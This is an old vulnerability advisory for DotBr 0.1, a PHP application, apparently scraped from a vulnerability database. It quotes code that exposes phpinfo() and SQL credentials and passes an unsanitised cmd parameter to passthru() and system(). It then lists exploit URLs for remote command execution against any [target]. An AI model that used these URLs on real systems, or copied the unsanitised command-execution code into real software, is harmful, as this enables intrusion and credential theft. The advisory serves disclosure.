DotBr (PHP)

2003-02-1800:00:00

vulners.com

JSON

Informations :
°°°°°°°°°°°°°°
Website : http://dotbr.org
Version : 0.1
Problems :

phpinfo()
Informations disclosure
System commands execution

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
foo.php3 :

<? phpinfo(); ?>

config.inc :

SQL password
SQL host
SQL username
SQL DB name

admin/exec.php3 :

<html>
<body>
<pre>
<?
if (!isset($sep)) {
$sep = "_";
}
$cmd=str_replace($sep," ",$cmd);
passthru($cmd,$ret);
echo $ret;
?>
</pre>
</body>
</html>

admin/system.php3 :

<html>
<body>
<pre>
<?
$cmd = str_replace("_"," ",$cmd);
system($cmd,$result);
echo "\n result == ". $result . "\n";
?>
</pre>
</body>
</html>

Exploits :
°°°°°°°°°°
http://[target]/foo.php3
http://[target]/config.inc
http://[target]/admin/exec.php3?cmd=[COMMAND]
http://[target]/admin/system.php3?cmd=[COMMAND]

More Details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/5holes8.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txt&langpair=fr%7Cen&hl=fr&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
http://www.phpsecure.org

JSON

DotBr &#40;PHP&#41;

PHP Code/Location : °°°°°°°°°°°°°°°°°°° foo.php3 :